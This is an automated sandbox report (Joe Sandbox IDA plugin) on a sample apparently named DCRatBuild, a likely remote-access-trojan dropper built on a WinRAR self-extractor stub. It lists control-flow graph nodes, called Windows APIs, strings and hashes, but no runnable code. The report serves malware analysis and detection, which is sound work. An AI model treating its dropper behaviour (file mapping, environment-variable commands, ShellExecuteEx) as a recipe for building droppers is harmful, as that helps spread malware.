d69bfc 23591->23593 23595 d69c03 23591->23595 23593->23542 23594 d69c9e 23594->23593 23655 d66f6b 75 API calls 23594->23655 23595->23593 23595->23594 23597 d69cc0 23595->23597 23643 d6984e 23595->23643 23597->23593 23598 d6984e 5 API calls 23597->23598 23598->23597 23599->23542 23600->23539 23601->23558 23602->23555 23603->23554 23604->23545 23605->23558 23606->23558 23607->23550 23609 d6b679 23608->23609 23617 d6b683 23609->23617 23618 d6b806 CharUpperW 23609->23618 23611 d6b692 23619 d6b832 CharUpperW 23611->23619 23613 d6b6a1 23614 d6b6a5 23613->23614 23615 d6b71c GetCurrentDirectoryW 23613->23615 23620 d6b806 CharUpperW 23614->23620 23615->23617 23617->23570 23618->23611 23619->23613 23620->23617 23621->23577 23622->23580 23624 d69824 23623->23624 23625 d69820 23623->23625 23624->23625 23634 d6a12d 23624->23634 23625->23586 23629 d696dc 23628->23629 23632 d696fa 23628->23632 23631 d696e8 CloseHandle 23629->23631 23629->23632 23630 d69719 23630->23586 23631->23632 23632->23630 23642 d66e3e 74 API calls 23632->23642 23635 d7e360 23634->23635 23636 d6a13a DeleteFileW 23635->23636 23637 d6984c 23636->23637 23638 d6a14d 23636->23638 23637->23586 23639 d6b66c 2 API calls 23638->23639 23640 d6a161 23639->23640 23640->23637 23641 d6a165 DeleteFileW 23640->23641 23641->23637 23642->23630 23644 d69867 ReadFile 23643->23644 23645 d6985c GetStdHandle 23643->23645 23646 d69880 23644->23646 23647 d698a0 23644->23647 23645->23644 23656 d69989 23646->23656 23647->23595 23649 d69887 23650 d69895 23649->23650 23651 d698b7 23649->23651 23652 d698a8 GetLastError 23649->23652 23653 d6984e GetFileType 23650->23653 23651->23647 23654 d698c7 GetLastError 23651->23654 23652->23647 23652->23651 23653->23647 23654->23647 23654->23650 23655->23593 23657 d69992 GetFileType 23656->23657 23658 d6998f 23656->23658 23659 d699a0 23657->23659 23658->23649 23659->23649 23663 d7e24f new 23660->23663 23661 d78854 23661->23028 23663->23661 23666 d871ad 7 API calls 2 library calls 23663->23666 23667 
d7ecce RaiseException CallUnexpected new 23663->23667 23668 d7ecb1 RaiseException Concurrency::cancel_current_task CallUnexpected 23663->23668 23666->23663 23670 d87430 CallUnexpected 23669->23670 23671 d87448 23670->23671 23673 d8757e _abort GetModuleHandleW 23670->23673 23691 d8a3f1 EnterCriticalSection 23671->23691 23675 d8743c 23673->23675 23674 d87450 23679 d874c5 23674->23679 23689 d874ee 23674->23689 23711 d87f30 20 API calls _abort 23674->23711 23675->23671 23703 d875c2 GetModuleHandleExW 23675->23703 23680 d874dd 23679->23680 23684 d881f1 _abort 5 API calls 23679->23684 23685 d881f1 _abort 5 API calls 23680->23685 23681 d8750b 23695 d8753d 23681->23695 23682 d87537 23712 d91a19 5 API calls CatchGuardHandler 23682->23712 23684->23680 23685->23689 23692 d8752e 23689->23692 23691->23674 23713 d8a441 LeaveCriticalSection 23692->23713 23694 d87507 23694->23681 23694->23682 23714 d8a836 23695->23714 23698 d8756b 23700 d875c2 _abort 8 API calls 23698->23700 23699 d8754b GetPEB 23699->23698 23701 d8755b GetCurrentProcess TerminateProcess 23699->23701 23702 d87573 ExitProcess 23700->23702 23701->23698 23704 d875ec GetProcAddress 23703->23704 23705 d8760f 23703->23705 23708 d87601 23704->23708 23706 d8761e 23705->23706 23707 d87615 FreeLibrary 23705->23707 23709 d7ec4a CatchGuardHandler 5 API calls 23706->23709 23707->23706 23708->23705 23710 d87628 23709->23710 23710->23671 23711->23679 23713->23694 23715 d8a85b 23714->23715 23718 d8a851 23714->23718 23716 d8a458 CallUnexpected 5 API calls 23715->23716 23716->23718 23717 d7ec4a CatchGuardHandler 5 API calls 23719 d87547 23717->23719 23718->23717 23719->23698 23719->23699 24856 d7acd0 100 API calls 24906 d719d0 26 API calls std::bad_exception::bad_exception 24857 d7a8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24858 d7eac0 27 API calls pre_c_initialization 24911 d797c0 10 API calls 24860 d89ec0 21 API calls 24912 d8b5c0 GetCommandLineA GetCommandLineW 24913 d8ebc1 21 API calls __vsnwprintf_l 24915 d7ebf7 20 
API calls 23829 d7e1f9 23830 d7e203 23829->23830 23831 d7df59 ___delayLoadHelper2@8 19 API calls 23830->23831 23832 d7e210 23831->23832 23835 d7aee0 23836 d7aeea __EH_prolog 23835->23836 23998 d6130b 23836->23998 23839 d7af2c 23843 d7afa2 23839->23843 23844 d7af39 23839->23844 23900 d7af18 23839->23900 23840 d7b5cb 24063 d7cd2e 23840->24063 23847 d7b041 GetDlgItemTextW 23843->23847 23853 d7afbc 23843->23853 23848 d7af75 23844->23848 23849 d7af3e 23844->23849 23845 d7b5f7 23851 d7b611 GetDlgItem SendMessageW 23845->23851 23852 d7b600 SendDlgItemMessageW 23845->23852 23846 d7b5e9 SendMessageW 23846->23845 23847->23848 23850 d7b077 23847->23850 23855 d7af96 KiUserCallbackDispatcher 23848->23855 23848->23900 23854 d6ddd1 53 API calls 23849->23854 23849->23900 23856 d7b08f GetDlgItem 23850->23856 23996 d7b080 23850->23996 24081 d79da4 GetCurrentDirectoryW 23851->24081 23852->23851 23858 d6ddd1 53 API calls 23853->23858 23859 d7af58 23854->23859 23855->23900 23861 d7b0c5 SetFocus 23856->23861 23862 d7b0a4 SendMessageW SendMessageW 23856->23862 23863 d7afde SetDlgItemTextW 23858->23863 24103 d61241 SHGetMalloc 23859->24103 23860 d7b641 GetDlgItem 23866 d7b664 SetWindowTextW 23860->23866 23867 d7b65e 23860->23867 23868 d7b0d5 23861->23868 23881 d7b0ed 23861->23881 23862->23861 23864 d7afec 23863->23864 23875 d7aff9 GetMessageW 23864->23875 23864->23900 24082 d7a2c7 GetClassNameW 23866->24082 23867->23866 23869 d6ddd1 53 API calls 23868->23869 23874 d7b0df 23869->23874 23870 d7af5f 23876 d7af63 SetDlgItemTextW 23870->23876 23870->23900 23871 d7b56b 23877 d6ddd1 53 API calls 23871->23877 24104 d7cb5a 23874->24104 23880 d7b010 IsDialogMessageW 23875->23880 23875->23900 23876->23900 23882 d7b57b SetDlgItemTextW 23877->23882 23880->23864 23884 d7b01f TranslateMessage DispatchMessageW 23880->23884 23886 d6ddd1 53 API calls 23881->23886 23885 d7b58f 23882->23885 23884->23864 23889 d6ddd1 53 API calls 23885->23889 23888 d7b124 23886->23888 23887 d7b6af 23893 d7b6df 23887->23893 
23898 d6ddd1 53 API calls 23887->23898 23894 d6400a _swprintf 51 API calls 23888->23894 23895 d7b5b8 23889->23895 23890 d7b0e6 24008 d6a04f 23890->24008 23892 d7bdf5 98 API calls 23892->23887 23906 d7bdf5 98 API calls 23893->23906 23926 d7b797 23893->23926 23899 d7b136 23894->23899 23896 d6ddd1 53 API calls 23895->23896 23896->23900 23904 d7b6c2 SetDlgItemTextW 23898->23904 23905 d7cb5a 16 API calls 23899->23905 23901 d7b847 23908 d7b850 EnableWindow 23901->23908 23909 d7b859 23901->23909 23902 d7b174 GetLastError 23903 d7b17f 23902->23903 24014 d7a322 SetCurrentDirectoryW 23903->24014 23911 d6ddd1 53 API calls 23904->23911 23905->23890 23907 d7b6fa 23906->23907 23915 d7b70c 23907->23915 23936 d7b731 23907->23936 23908->23909 23912 d7b876 23909->23912 24122 d612c8 GetDlgItem EnableWindow 23909->24122 23914 d7b6d6 SetDlgItemTextW 23911->23914 23920 d7b89d 23912->23920 23928 d7b895 SendMessageW 23912->23928 23913 d7b195 23918 d7b1ac 23913->23918 23919 d7b19e GetLastError 23913->23919 23914->23893 24120 d79635 32 API calls 23915->24120 23916 d7b78a 23921 d7bdf5 98 API calls 23916->23921 23931 d7b237 23918->23931 23933 d7b1c4 GetTickCount 23918->23933 23974 d7b227 23918->23974 23919->23918 23920->23900 23924 d6ddd1 53 API calls 23920->23924 23921->23926 23923 d7b86c 24123 d612c8 GetDlgItem EnableWindow 23923->24123 23930 d7b8b6 SetDlgItemTextW 23924->23930 23925 d7b725 23925->23936 23926->23901 23929 d7b825 23926->23929 23941 d6ddd1 53 API calls 23926->23941 23928->23920 24121 d79635 32 API calls 23929->24121 23930->23900 23938 d7b24f GetModuleFileNameW 23931->23938 23939 d7b407 23931->23939 23932 d7b46c 24023 d612e6 GetDlgItem ShowWindow 23932->24023 23934 d6400a _swprintf 51 API calls 23933->23934 23946 d7b1dd 23934->23946 23936->23916 23942 d7bdf5 98 API calls 23936->23942 24114 d6eb3a 80 API calls 23938->24114 23939->23848 23947 d6ddd1 53 API calls 23939->23947 23940 d7b844 23940->23901 23941->23926 23948 d7b75f 23942->23948 23943 d7b47c 24024 d612e6 GetDlgItem 
ShowWindow 23943->24024 23945 d7b275 23951 d6400a _swprintf 51 API calls 23945->23951 24015 d6971e 23946->24015 23952 d7b41b 23947->23952 23948->23916 23953 d7b768 DialogBoxParamW 23948->23953 23950 d7b486 23954 d6ddd1 53 API calls 23950->23954 23955 d7b297 CreateFileMappingW 23951->23955 23957 d6400a _swprintf 51 API calls 23952->23957 23953->23848 23953->23916 23958 d7b490 SetDlgItemTextW 23954->23958 23959 d7b2f9 GetCommandLineW 23955->23959 23992 d7b376 __vswprintf_c_l 23955->23992 23961 d7b439 23957->23961 24025 d612e6 GetDlgItem ShowWindow 23958->24025 23964 d7b30a 23959->23964 23960 d7b203 23965 d7b20a GetLastError 23960->23965 23966 d7b215 23960->23966 23973 d6ddd1 53 API calls 23961->23973 23962 d7b381 ShellExecuteExW 23987 d7b39e 23962->23987 24115 d7ab2e SHGetMalloc 23964->24115 23965->23966 23969 d69653 79 API calls 23966->23969 23967 d7b4a2 SetDlgItemTextW GetDlgItem 23970 d7b4d7 23967->23970 23971 d7b4bf GetWindowLongW SetWindowLongW 23967->23971 23969->23974 24026 d7bdf5 23970->24026 23971->23970 23972 d7b326 24116 d7ab2e SHGetMalloc 23972->24116 23973->23848 23974->23931 23974->23932 23978 d7b332 24117 d7ab2e SHGetMalloc 23978->24117 23979 d7b3e1 23979->23939 23986 d7b3f7 UnmapViewOfFile CloseHandle 23979->23986 23980 d7bdf5 98 API calls 23982 d7b4f3 23980->23982 24051 d7d0f5 23982->24051 23983 d7b33e 24118 d6ecad 80 API calls ___scrt_get_show_window_mode 23983->24118 23986->23939 23987->23979 23990 d7b3cd Sleep 23987->23990 23989 d7b355 MapViewOfFile 23989->23992 23990->23979 23990->23987 23991 d7bdf5 98 API calls 23995 d7b519 23991->23995 23992->23962 23993 d7b542 24119 d612c8 GetDlgItem EnableWindow 23993->24119 23995->23993 23997 d7bdf5 98 API calls 23995->23997 23996->23848 23996->23871 23997->23993 23999 d61314 23998->23999 24000 d6136d 23998->24000 24002 d6137a 23999->24002 24124 d6da98 62 API calls 2 library calls 23999->24124 24125 d6da71 GetWindowLongW SetWindowLongW 24000->24125 24002->23839 24002->23840 24002->23900 24004 d61336 
24004->24002 24005 d61349 GetDlgItem 24004->24005 24005->24002 24006 d61359 24005->24006 24006->24002 24007 d6135f SetWindowTextW 24006->24007 24007->24002 24011 d6a059 24008->24011 24009 d6a0ea 24010 d6a207 9 API calls 24009->24010 24012 d6a113 24009->24012 24010->24012 24011->24009 24011->24012 24126 d6a207 24011->24126 24012->23902 24012->23903 24014->23913 24016 d69728 24015->24016 24017 d69792 CreateFileW 24016->24017 24018 d69786 24016->24018 24017->24018 24019 d697e4 24018->24019 24020 d6b66c 2 API calls 24018->24020 24019->23960 24021 d697cb 24020->24021 24021->24019 24022 d697cf CreateFileW 24021->24022 24022->24019 24023->23943 24024->23950 24025->23967 24027 d7bdff __EH_prolog 24026->24027 24028 d7b4e5 24027->24028 24158 d7aa36 24027->24158 24028->23980 24031 d7aa36 ExpandEnvironmentStringsW 24040 d7be36 _wcsrchr 24031->24040 24032 d7c11d SetWindowTextW 24032->24040 24037 d7bf0b SetFileAttributesW 24039 d7bfc5 GetFileAttributesW 24037->24039 24050 d7bf25 ___scrt_get_show_window_mode 24037->24050 24039->24040 24042 d7bfd7 DeleteFileW 24039->24042 24040->24028 24040->24031 24040->24032 24040->24037 24043 d7c2e7 GetDlgItem SetWindowTextW SendMessageW 24040->24043 24046 d7c327 SendMessageW 24040->24046 24162 d717ac CompareStringW 24040->24162 24163 d79da4 GetCurrentDirectoryW 24040->24163 24165 d6a52a 7 API calls 24040->24165 24166 d6a4b3 FindClose 24040->24166 24167 d7ab9a 76 API calls new 24040->24167 24168 d835de 24040->24168 24042->24040 24044 d7bfe8 24042->24044 24043->24040 24045 d6400a _swprintf 51 API calls 24044->24045 24047 d7c008 GetFileAttributesW 24045->24047 24046->24040 24047->24044 24048 d7c01d MoveFileW 24047->24048 24048->24040 24049 d7c035 MoveFileExW 24048->24049 24049->24040 24050->24039 24050->24040 24164 d6b4f7 52 API calls 2 library calls 24050->24164 24052 d7d0ff __EH_prolog 24051->24052 24183 d6fead 24052->24183 24054 d7d130 24187 d65c59 24054->24187 24056 d7d14e 24191 d67c68 24056->24191 24060 d7d1a1 24208 d67cfb 24060->24208 24062 
d7b504 24062->23991 24064 d7cd38 24063->24064 24065 d79d1a 4 API calls 24064->24065 24066 d7cd3d 24065->24066 24067 d7cd45 GetWindow 24066->24067 24068 d7b5d1 24066->24068 24067->24068 24071 d7cd65 24067->24071 24068->23845 24068->23846 24069 d7cd72 GetClassNameW 24642 d717ac CompareStringW 24069->24642 24071->24068 24071->24069 24072 d7cd96 GetWindowLongW 24071->24072 24073 d7cdfa GetWindow 24071->24073 24072->24073 24074 d7cda6 SendMessageW 24072->24074 24073->24068 24073->24071 24074->24073 24075 d7cdbc GetObjectW 24074->24075 24643 d79d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24075->24643 24078 d7cdd3 24644 d79d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24078->24644 24645 d79f5d 8 API calls ___scrt_get_show_window_mode 24078->24645 24080 d7cde4 SendMessageW DeleteObject 24080->24073 24081->23860 24083 d7a30d 24082->24083 24084 d7a2e8 24082->24084 24086 d7a312 SHAutoComplete 24083->24086 24087 d7a31b 24083->24087 24646 d717ac CompareStringW 24084->24646 24086->24087 24090 d7a7c3 24087->24090 24088 d7a2fb 24088->24083 24089 d7a2ff FindWindowExW 24088->24089 24089->24083 24091 d7a7cd __EH_prolog 24090->24091 24092 d61380 82 API calls 24091->24092 24093 d7a7ef 24092->24093 24647 d61f4f 24093->24647 24096 d7a809 24098 d61631 84 API calls 24096->24098 24097 d7a818 24099 d61951 126 API calls 24097->24099 24101 d7a814 24098->24101 24100 d7a83a __vswprintf_c_l new 24099->24100 24100->24101 24102 d61631 84 API calls 24100->24102 24101->23887 24101->23892 24102->24101 24103->23870 24105 d7ac74 5 API calls 24104->24105 24106 d7cb66 GetDlgItem 24105->24106 24107 d7cbbc SendMessageW SendMessageW 24106->24107 24108 d7cb88 24106->24108 24109 d7cc17 SendMessageW SendMessageW SendMessageW 24107->24109 24110 d7cbf8 24107->24110 24111 d7cb93 ShowWindow SendMessageW SendMessageW 24108->24111 24112 d7cc6d SendMessageW 24109->24112 24113 d7cc4a SendMessageW 24109->24113 24110->24109 24111->24107 24112->23890 24113->24112 24114->23945 24115->23972 24116->23978 24117->23983 
24118->23989 24119->23996 24120->23925 24121->23940 24122->23923 24123->23912 24124->24004 24125->24002 24127 d6a214 24126->24127 24128 d6a238 24127->24128 24129 d6a22b CreateDirectoryW 24127->24129 24147 d6a180 24128->24147 24129->24128 24131 d6a26b 24129->24131 24135 d6a27a 24131->24135 24139 d6a444 24131->24139 24133 d6a27e GetLastError 24133->24135 24135->24011 24136 d6b66c 2 API calls 24137 d6a254 24136->24137 24137->24133 24138 d6a258 CreateDirectoryW 24137->24138 24138->24131 24138->24133 24140 d7e360 24139->24140 24141 d6a451 SetFileAttributesW 24140->24141 24142 d6a467 24141->24142 24143 d6a494 24141->24143 24144 d6b66c 2 API calls 24142->24144 24143->24135 24145 d6a47b 24144->24145 24145->24143 24146 d6a47f SetFileAttributesW 24145->24146 24146->24143 24150 d6a194 24147->24150 24151 d7e360 24150->24151 24152 d6a1a1 GetFileAttributesW 24151->24152 24153 d6a1b2 24152->24153 24154 d6a189 24152->24154 24155 d6b66c 2 API calls 24153->24155 24154->24133 24154->24136 24156 d6a1c6 24155->24156 24156->24154 24157 d6a1ca GetFileAttributesW 24156->24157 24157->24154 24159 d7aa40 24158->24159 24160 d7aaf3 ExpandEnvironmentStringsW 24159->24160 24161 d7ab16 24159->24161 24160->24161 24161->24040 24162->24040 24163->24040 24164->24050 24165->24040 24166->24040 24167->24040 24169 d88606 24168->24169 24170 d8861e 24169->24170 24171 d88613 24169->24171 24173 d88626 24170->24173 24180 d8862f CallUnexpected 24170->24180 24172 d88518 __vsnwprintf_l 21 API calls 24171->24172 24177 d8861b 24172->24177 24174 d884de _free 20 API calls 24173->24174 24174->24177 24175 d88659 HeapReAlloc 24175->24177 24175->24180 24176 d88634 24181 d8895a 20 API calls _abort 24176->24181 24177->24040 24180->24175 24180->24176 24182 d871ad 7 API calls 2 library calls 24180->24182 24181->24177 24182->24180 24184 d6feba 24183->24184 24212 d61789 24184->24212 24186 d6fed2 24186->24054 24188 d6fead 24187->24188 24189 d61789 76 API calls 24188->24189 24190 d6fed2 24189->24190 24190->24056 24192 d67c72 
__EH_prolog 24191->24192 24229 d6c827 24192->24229 24194 d67c8d 24195 d7e24a new 8 API calls 24194->24195 24196 d67cb7 24195->24196 24235 d7440b 24196->24235 24199 d67ddf 24200 d67de9 24199->24200 24201 d67e53 24200->24201 24264 d6a4c6 24200->24264 24205 d67ec4 24201->24205 24207 d6a4c6 8 API calls 24201->24207 24242 d6837f 24201->24242 24203 d67f06 24203->24060 24205->24203 24270 d66dc1 74 API calls 24205->24270 24207->24201 24209 d67d09 24208->24209 24211 d67d10 24208->24211 24210 d71acf 84 API calls 24209->24210 24210->24211 24213 d6179f 24212->24213 24224 d617fa __vswprintf_c_l 24212->24224 24214 d617c8 24213->24214 24225 d66e91 74 API calls __vswprintf_c_l 24213->24225 24216 d61827 24214->24216 24221 d617e7 new 24214->24221 24218 d835de 22 API calls 24216->24218 24217 d617be 24226 d66efd 75 API calls 24217->24226 24220 d6182e 24218->24220 24220->24224 24228 d66efd 75 API calls 24220->24228 24221->24224 24227 d66efd 75 API calls 24221->24227 24224->24186 24225->24217 24226->24214 24227->24224 24228->24224 24230 d6c831 __EH_prolog 24229->24230 24231 d7e24a new 8 API calls 24230->24231 24232 d6c874 24231->24232 24233 d7e24a new 8 API calls 24232->24233 24234 d6c898 24233->24234 24234->24194 24236 d74415 __EH_prolog 24235->24236 24237 d7e24a new 8 API calls 24236->24237 24238 d74431 24237->24238 24239 d67ce6 24238->24239 24241 d706ba 78 API calls 24238->24241 24239->24199 24241->24239 24243 d68389 __EH_prolog 24242->24243 24271 d61380 24243->24271 24245 d683a4 24279 d69ef7 24245->24279 24251 d683d3 24399 d61631 24251->24399 24252 d6846e 24298 d68517 24252->24298 24256 d684ce 24302 d61f00 24256->24302 24258 d683cf 24258->24251 24258->24252 24262 d6a4c6 8 API calls 24258->24262 24403 d6bac4 CompareStringW 24258->24403 24260 d684d9 24260->24251 24306 d63aac 24260->24306 24316 d6857b 24260->24316 24262->24258 24265 d6a4db 24264->24265 24269 d6a4df 24265->24269 24630 d6a5f4 24265->24630 24267 d6a4ef 24268 d6a4f4 FindClose 24267->24268 24267->24269 24268->24269 
24269->24200 24270->24203 24272 d61385 __EH_prolog 24271->24272 24273 d6c827 8 API calls 24272->24273 24274 d613bd 24273->24274 24275 d7e24a new 8 API calls 24274->24275 24278 d61416 ___scrt_get_show_window_mode 24274->24278 24276 d61403 24275->24276 24277 d6b07d 82 API calls 24276->24277 24276->24278 24277->24278 24278->24245 24280 d69f0e 24279->24280 24281 d683ba 24280->24281 24405 d66f5d 76 API calls 24280->24405 24281->24251 24283 d619a6 24281->24283 24284 d619b0 __EH_prolog 24283->24284 24295 d61a00 24284->24295 24296 d619e5 24284->24296 24406 d6709d 24284->24406 24286 d61b50 24409 d66dc1 74 API calls 24286->24409 24288 d63aac 97 API calls 24291 d61bb3 24288->24291 24289 d61b60 24289->24288 24289->24296 24290 d61bff 24290->24296 24297 d61c32 24290->24297 24410 d66dc1 74 API calls 24290->24410 24291->24290 24293 d63aac 97 API calls 24291->24293 24293->24291 24294 d63aac 97 API calls 24294->24297 24295->24286 24295->24289 24295->24296 24296->24258 24297->24294 24297->24296 24300 d68524 24298->24300 24428 d70c26 GetSystemTime SystemTimeToFileTime 24300->24428 24301 d68488 24301->24256 24404 d71359 72 API calls 24301->24404 24303 d61f05 __EH_prolog 24302->24303 24304 d61f39 24303->24304 24430 d61951 24303->24430 24304->24260 24307 d63abc 24306->24307 24308 d63ab8 24306->24308 24309 d63af7 24307->24309 24310 d63ae9 24307->24310 24308->24260 24565 d627e8 97 API calls 3 library calls 24309->24565 24311 d63b29 24310->24311 24564 d63281 85 API calls 3 library calls 24310->24564 24311->24260 24314 d63af5 24314->24311 24566 d6204e 74 API calls 24314->24566 24317 d68585 __EH_prolog 24316->24317 24318 d685be 24317->24318 24331 d685c2 24317->24331 24588 d784bd 99 API calls 24317->24588 24319 d685e7 24318->24319 24325 d6867a 24318->24325 24318->24331 24320 d68609 24319->24320 24319->24331 24589 d67b66 151 API calls 24319->24589 24320->24331 24590 d784bd 99 API calls 24320->24590 24325->24331 24567 d65e3a 24325->24567 24326 d68705 24326->24331 24573 d6826a 24326->24573 24329 
d68875 24330 d6a4c6 8 API calls 24329->24330 24332 d688e0 24329->24332 24330->24332 24331->24260 24577 d67d6c 24332->24577 24334 d6c991 80 API calls 24337 d6893b _memcmp 24334->24337 24335 d68a70 24336 d68b43 24335->24336 24343 d68abf 24335->24343 24341 d68b9e 24336->24341 24351 d68b4e 24336->24351 24337->24331 24337->24334 24337->24335 24338 d68a69 24337->24338 24591 d68236 82 API calls 24337->24591 24592 d61f94 74 API calls 24337->24592 24593 d61f94 74 API calls 24338->24593 24350 d68b30 24341->24350 24596 d680ea 96 API calls 24341->24596 24342 d68b9c 24344 d69653 79 API calls 24342->24344 24345 d6a180 4 API calls 24343->24345 24343->24350 24344->24331 24348 d68af7 24345->24348 24347 d69653 79 API calls 24347->24331 24348->24350 24594 d69377 96 API calls 24348->24594 24349 d68c09 24353 d69989 GetFileType 24349->24353 24362 d68c74 24349->24362 24390 d691c1 ___InternalCxxFrameHandler 24349->24390 24350->24342 24350->24349 24351->24342 24595 d67f26 100 API calls ___InternalCxxFrameHandler 24351->24595 24352 d6aa88 8 API calls 24356 d68cc3 24352->24356 24354 d68c4c 24353->24354 24354->24362 24597 d61f94 74 API calls 24354->24597 24358 d6aa88 8 API calls 24356->24358 24377 d68cd9 24358->24377 24360 d68c62 24598 d67061 75 API calls 24360->24598 24362->24352 24363 d68d9c 24364 d68df7 24363->24364 24365 d68efd 24363->24365 24366 d68e69 24364->24366 24367 d68e07 24364->24367 24369 d68f23 24365->24369 24370 d68f0f 24365->24370 24384 d68e27 24365->24384 24368 d6826a CharUpperW 24366->24368 24373 d68e4d 24367->24373 24380 d68e15 24367->24380 24374 d68e84 24368->24374 24372 d72c42 75 API calls 24369->24372 24371 d692e6 121 API calls 24370->24371 24371->24384 24376 d68f3c 24372->24376 24373->24384 24601 d67907 108 API calls 24373->24601 24382 d68eb4 24374->24382 24383 d68ead 24374->24383 24374->24384 24604 d728f1 121 API calls 24376->24604 24377->24363 24599 d69b21 SetFilePointer GetLastError SetEndOfFile 24377->24599 24600 d61f94 74 API calls 24380->24600 24603 d69224 94 API 
control_flow_graph: basic-block edge list of the preceding function (rendered graph residue; not reproduced)

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00D700CF: GetModuleHandleW.KERNEL32(kernel32), ref: 00D700E4
                        • Part of subcall function 00D700CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D700F6
                        • Part of subcall function 00D700CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D70127
                        • Part of subcall function 00D79DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00D79DAC
                        • Part of subcall function 00D7A335: OleInitialize.OLE32(00000000), ref: 00D7A34E
                        • Part of subcall function 00D7A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D7A385
                        • Part of subcall function 00D7A335: SHGetMalloc.SHELL32(00DA8430), ref: 00D7A38F
                        • Part of subcall function 00D713B3: GetCPInfo.KERNEL32(00000000,?), ref: 00D713C4
                        • Part of subcall function 00D713B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 00D713D8
                      • GetCommandLineW.KERNEL32 ref: 00D7D61C
                      • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00D7D643
                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00D7D654
                      • UnmapViewOfFile.KERNEL32(00000000), ref: 00D7D68E
                        • Part of subcall function 00D7D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D7D29D
                        • Part of subcall function 00D7D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D7D2D9
                      • CloseHandle.KERNEL32(00000000), ref: 00D7D697
                      • GetModuleFileNameW.KERNEL32(00000000,00DBDC90,00000800), ref: 00D7D6B2
                      • SetEnvironmentVariableW.KERNEL32(sfxname,00DBDC90), ref: 00D7D6BE
                      • GetLocalTime.KERNEL32(?), ref: 00D7D6C9
                      • _swprintf.LIBCMT ref: 00D7D708
                      • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00D7D71A
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00D7D721
                      • LoadIconW.USER32(00000000,00000064), ref: 00D7D738
                      • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 00D7D789
                      • Sleep.KERNEL32(?), ref: 00D7D7B7
                      • DeleteObject.GDI32 ref: 00D7D7F0
                      • DeleteObject.GDI32(?), ref: 00D7D800
                      • CloseHandle.KERNEL32 ref: 00D7D843
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                      • API String ID: 788466649-277078469
                      • Opcode ID: 2b137506a4ab7936ff0a511fb65dd87ce3996a1102818b6a9ad2578a01e785a0
                      • Instruction ID: 8d0b8354c1599ae57036f21089078b39569876d11931fd150247357d846e2589
                      • Opcode Fuzzy Hash: 2b137506a4ab7936ff0a511fb65dd87ce3996a1102818b6a9ad2578a01e785a0
                      • Instruction Fuzzy Hash: E761AE71904341AFD320AFA5EC49F6A3BA9EF49744F04442AF94DD23A1EBB89904D772

                      Control-flow Graph

                      control_flow_graph d79e1c-d79f32 (executed / not-executed basic blocks; rendered graph edge list not reproduced)
                      APIs
                      • FindResourceW.KERNEL32(00D7AE4D,PNG,?,?,?,00D7AE4D,00000066), ref: 00D79E2E
                      • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00D7AE4D,00000066), ref: 00D79E46
                      • LoadResource.KERNEL32(00000000,?,?,?,00D7AE4D,00000066), ref: 00D79E59
                      • LockResource.KERNEL32(00000000,?,?,?,00D7AE4D,00000066), ref: 00D79E64
                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00D7AE4D,00000066), ref: 00D79E82
                      • GlobalLock.KERNEL32(00000000), ref: 00D79E93
                      • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00D79EB7
                      • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00D79EFC
                      • GlobalUnlock.KERNEL32(00000000), ref: 00D79F1B
                      • GlobalFree.KERNEL32(00000000), ref: 00D79F22
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
